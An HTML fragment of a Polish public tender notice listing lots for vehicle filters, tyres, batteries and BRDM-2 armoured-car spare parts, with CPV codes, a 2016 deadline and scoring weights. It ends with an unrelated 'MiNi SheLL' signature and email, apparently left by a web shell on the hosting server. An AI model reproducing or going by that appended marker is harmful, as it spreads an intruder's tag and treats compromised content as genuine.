<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia (dostaw cząstkowych) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa części zamiennych - filtry oleju, paliwa, powietrza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia obejmuje swym zakresem dostawę następującego asortymentu: filtry oleju, filtry paliwa, filtry powietrza, separatory powietrza, separatory wody, wkłady filtrujące, filtry kabinowe, 
b) Szczegółowy opis przedmiotu zamówienia dla części nr 3 zawarty został w Załączniku nr 1C do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia (dostaw cząstkowych) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa opon, dętek i ochraniaczy dętek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia obejmuje swym zakresem dostawę następującego asortymentu: opony, dętki, ochraniacze dętki;
b) Szczegółowy opis przedmiotu zamówienia dla części nr 4 zawarty został w Załączniku nr 1D do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia (dostaw cząstkowych) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa akumulatorów kwasowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia obejmuje swym zakresem dostawę następującego asortymentu: akumulatory kwasowo-rozruchowe;
b) Szczegółowy opis przedmiotu zamówienia dla części nr 5 zawarty został w Załączniku nr 1E do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia (dostaw cząstkowych) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa części zamiennych do BRDM-2, BRDM-ŻBIK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia obejmuje swym zakresem dostawę następującego asortymentu: szczęki hamulcowe, cylindry hamulcowe, pierścienie uszczelniające, wentylatory nawiewu, świece zapłonowe, końcówki drążka kierowniczego, drążki ramienia, uszczelniacze, łożyska zwrotnicy, zbiorniki paliwa, gaźniki, przewody wysokiego napięcia, strzemię resoru, poduszki resoru, amortyzatory, tulejki amortyzatora, przewody hamulcowe, cylindry wspomagacza, pompy hamulcowe, filtry dokładnego oczyszczania paliwa, tłumiki kompletne, rozruszniki, zespoły pasów, paski klinowe, sprzęgła, lampy, pompy sprzęgła, dźwignie przełączania biegów, pompy paliwa, widełki przegubu napędu wentylatora, wałki napędu wentylatora, zawory sterowania wspomagania, przełączniki;  
b) Szczegółowy opis przedmiotu zamówienia dla części nr 6 zawarty został w Załączniku nr 1F do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia (dostaw cząstkowych) - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com